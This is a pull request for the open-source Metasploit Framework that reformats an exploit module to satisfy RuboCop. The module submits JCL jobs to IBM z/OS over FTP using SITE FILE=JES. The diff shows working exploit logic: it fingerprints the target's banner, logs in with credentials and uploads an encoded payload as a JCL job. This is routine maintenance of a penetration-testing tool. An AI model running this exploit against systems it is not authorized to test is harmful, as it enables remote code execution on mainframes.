### PR TITLE
modules/exploits/mainframe: Resolve RuboCop violations

### DIFF
--- a/modules/exploits/mainframe/ftp/ftp_jcl_creds.rb
+++ b/modules/exploits/mainframe/ftp/ftp_jcl_creds.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
@@ -11,32 +10,40 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
-    super(update_info(
-      info,
-      'Name'           => 'FTP JCL Execution',
-      'Description'    => %q{(Submit JCL to z/OS via FTP and SITE FILE=JES.
-        This exploit requires valid credentials on the target system)},
-      'Author'         =>
-         [
-           'Bigendian Smalls',
-           'mainframed a.k.a. soldier of fortran',
-           'S&Oxballs a.k.a. chiefascot'
-         ],
-      'Arch'           => ARCH_CMD,
-      'License'        => MSF_LICENSE,
-      'Platform'       => ['mainframe'],
-      'Privileged'     => false,
-      'Targets'        => [['Automatic', {}]],
-      'DisclosureDate' => '2013-05-12',
-      'DisableNops'    => 'true',
-      'DefaultTarget'  => 0
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'FTP JCL Execution',
+        'Description' => %q{
+          Submit JCL to z/OS via FTP and SITE FILE=JES.
+          This exploit requires valid credentials on the target system.
+        },
+        'Author' => [
+          'Bigendian Smalls',
+          'mainframed a.k.a. soldier of fortran',
+          'S&Oxballs a.k.a. chiefascot'
+        ],
+        'Arch' => ARCH_CMD,
+        'License' => MSF_LICENSE,
+        'Platform' => ['mainframe'],
+        'Privileged' => false,
+        'Targets' => [['Automatic', {}]],
+        'DisclosureDate' => '2013-05-12',
+        'DisableNops' => 'true',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(21),
-        OptInt.new('SLEEP', [ false, "Time to wait before checking if job has completed.", 5 ])
-      ], self.class
+        OptInt.new('SLEEP', [ false, 'Time to wait before checking if job has completed.', 5 ])
+      ]
     )
   end
 
@@ -48,11 +55,9 @@ class MetasploitModule < Msf::Exploit::Remote
     ##
     # Connect to get the FTP banner and check target OS
     ##
-    if !connect_login
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failed to connect to FTP server")
-    else
-      print_good("Successfully connected to FTP server.")
-    end
+    fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failed to connect to FTP server") unless connect_login
+
+    print_good('Successfully connected to FTP server.')
     test_jes = send_cmd(['site', 'file=jes'])
 
     # Disconnect and check cached self.banner
@@ -61,40 +66,29 @@ class MetasploitModule < Msf::Exploit::Remote
     ##
     # Check if the target system has an FTP server running on z/OS"
     ##
-    case banner
-    when /IBM FTP CS V.R./
-      case test_jes
-      when /200 SITE/
-        print_status("Found IBM z/OS Banner and JES commands accepted")
-        return Exploit::CheckCode::Vulnerable
-      else
-        print_error("Found IBM z/OS Banner but SITE FILE=JES failed. Try anyway!")
-        return Exploit::CheckCode::Detected
-      end
-
-    ##
-    # Return the Safe flag if system is not exploitable
-    ##
-    else
-      print_status("We could not recognize the server banner: #{banner.strip}")
-      return Exploit::CheckCode::Safe
+    unless banner =~ /IBM FTP CS V.R./
+      return CheckCode::Safe("We could not recognize the server banner: #{banner.strip}")
     end
+
+    if test_jes =~ /200 SITE/
+      return CheckCode::Vulnerable('Found IBM z/OS Banner and JES commands accepted')
+    end
+
+    CheckCode::Detected('Found IBM z/OS Banner but SITE FILE=JES failed. Try anyway!')
   end
 
   ##
   # Exploit the target system by submitting a JCL job via FTP
   ##
   def exploit
-    if !connect_login
-      fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} - Failed to connect to FTP server")
-    else
-      print_good("Successfully connected to FTP server.")
-    end
+    fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} - Failed to connect to FTP server") unless connect_login
+
+    print_good('Successfully connected to FTP server.')
 
     send_cmd(['site', 'file=jes'])
-    print_good("Successfully switched to JES mode")
+    print_good('Successfully switched to JES mode')
 
-    jcl_file_name = "#{Rex::Text.rand_text_alpha(8).upcase}"
+    jcl_file_name = Rex::Text.rand_text_alpha_upper(8)
     print_status("Uploading JCL file: #{jcl_file_name}")
 
     res = send_cmd_data(['put', jcl_file_name], payload.encoded)


### PR DESCRIPTION
Most violations were resolved with `rubocop -a`.

Notes were added manually based upon the [module documentation](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/mainframe/ftp/ftp_jcl_creds.md).

Some code changes were applied manually, including:

* Removed superfluous `()` around module description string.
* Replaced `Rex::Text.rand_text_alpha(8).upcase` with `Rex::Text.rand_text_alpha_upper(8)`.
* Modified conditional branches with redundant `else` after `return` (or `return` equivalent, such as `fail_with`).
* Replaced `print_*`calls in the `check` method with `CheckCode` messages
